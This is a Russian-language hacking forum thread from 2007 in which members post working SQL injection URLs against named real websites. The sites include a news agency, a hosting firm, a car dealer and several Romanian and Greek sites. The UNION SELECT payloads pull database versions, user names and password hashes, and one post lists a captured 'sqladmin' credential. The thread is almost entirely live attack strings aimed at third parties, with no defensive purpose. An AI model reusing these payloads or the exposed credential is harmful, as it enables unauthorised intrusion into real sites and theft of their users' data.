HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.03.2007, 12:07
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

www.itartass.ur.ru
Цитата:
http://www.itartass.ur.ru/money/print.php?id=-9+union+select+1,2,3,version(),5,6,7,8,9
5 версия, 103 столбца, ничё интересного не нашёл 0_о
 
Ответить с цитированием

  #2  
Старый 18.03.2007, 14:32
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Может и было...

Код:
http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13/*
 
Ответить с цитированием

  #3  
Старый 18.03.2007, 15:15
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
С нами: 10170610

Репутация: 181
По умолчанию

Цитата:
Сообщение от Grey  
Может и было...

Код:
http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13/*
http://mp3.volpi.ru/view.php?id=-1+union+select+1,concat(user,char(58),password),3, 4,5,6,7,8,9,10,11,12,13+from+mysql.user/*

Цитата:
www.itartass.ur.ru

Цитата:
http://www.itartass.ur.ru/money/print.php?id=-9+union+select+1,2,3,version(),5,6,7,8,9


5 версия, 103 столбца, ничё интересного не нашёл 0_о
Ты наверное хотел сказать 103 таблицы)))

Последний раз редактировалось Colkru; 18.03.2007 в 15:17..
 
Ответить с цитированием

  #4  
Старый 18.03.2007, 15:20
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

_cwhost.ru
Код:
http://cwhost.ru/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pass,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15,16,17+from+nuke_users+limit+0,1/*
хостинг какой-то... кривой.. при попытке зайти бросает на valuehost, мб подкомпания... дальше не смотрел, т.к. сайт не грузится что-то

webstudent.ru
Код:
http://webstudent.ru/modules/wfsection/article.php?articleid=1020+and+1020=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
там xoops 2.*
таблица вроде users называется, префикс по умолчанию - xoops. но в данном случае другой не стал копаться..

Последний раз редактировалось n1†R0x; 18.03.2007 в 15:22..
 
Ответить с цитированием

  #5  
Старый 18.03.2007, 16:32
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами: 10085717

Репутация: 590
По умолчанию

Код:
http://www.fiat.com.ro/carinfo_galerie.php?id=-17%20UNION%20SELECT%201,2,concat(user(),0x3a,database()),4,5,6,7,8,9/*
Код:
http://www.eliberadio.ro/show.php?id=21+union+select+1,version(),3,4,5,6,7,8,9,10,11+limit+1,1/*
Код:
http://www.romanicriss.org/noutati.php?id=-13%20UNION%20SELECT%201,2,3,4,5,password,7,8,9,10,11,12+from+users/*
Код:
http://www.istyle.ro/categorie.php?id=-97+union+select+1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*
pass:4ef35e0e3f1db2c1
user: sqladmin
 
Ответить с цитированием

  #6  
Старый 18.03.2007, 17:29
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

www.wargames.ru

Код:
http://www.wargames.ru/sections.php?op=listarticles&secid=-1+union+select+1,convert(concat(name,char(58),pass),char),3,4+from+users/*
Вот только ни как юзер, ни как админ зайти почемуто нельзя.


www.splav.kharkov.com

Таблу не подобрал =(
Код:
http://www.splav.kharkov.com/choose_mat.php?class_id=-1+union+select+user()/*

Последний раз редактировалось Ksander; 18.03.2007 в 17:48..
 
Ответить с цитированием

  #7  
Старый 18.03.2007, 21:19
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами: 10085717

Репутация: 590
По умолчанию

Код:
http://www.metafysiko.gr/interviews.php?id=-20+union+select+1,version(),3/*
Код:
http://www.paokworld.com/outputofarticle.php?ID=-373+union+select+1,2,user(),4,5,6,7,8,9,10/*
Код:
http://www.rwf.gr/episode1-new.php?id=81%20UNION%20SELECT%201,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8+limit+1,1/*
Код:
http://www.uip.edu/fr/colloques.php?id=-9%20UNION%20SELECT%201,user(),3,4,5,6,7,8/*

Последний раз редактировалось XTErner; 18.03.2007 в 23:43..
 
Ответить с цитированием

  #8  
Старый 19.03.2007, 00:02
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

www.mediaprovinces.kz

Код:
http://www.mediaprovinces.kz/index.php?r=-1+union+select+username,2+from+phpbb_users/*

Еще одна перед сном =)

Вроде стандартные названия колонок не подходят =(

Код:
http://www.fitness.ru/news/shownews.phtml?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13+from+users/*

Последний раз редактировалось Ksander; 19.03.2007 в 01:10..
 
Ответить с цитированием

  #9  
Старый 19.03.2007, 14:59
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
С нами: 10715512

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

_http://www.hw.net.ua/photoart.php?id='+union+select+1,2,table_name,4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schem a.tables+limit+16,1/*
 
Ответить с цитированием

  #10  
Старый 19.03.2007, 15:59
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами: 10188326

Репутация: 1866


По умолчанию

Код:
http://www.infonew.ru/show.php?cid=-1+union+select+concat(login,0x3a,password)+from+users+limit+0,1/*
=\
 
Ответить с цитированием
Ответ





Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.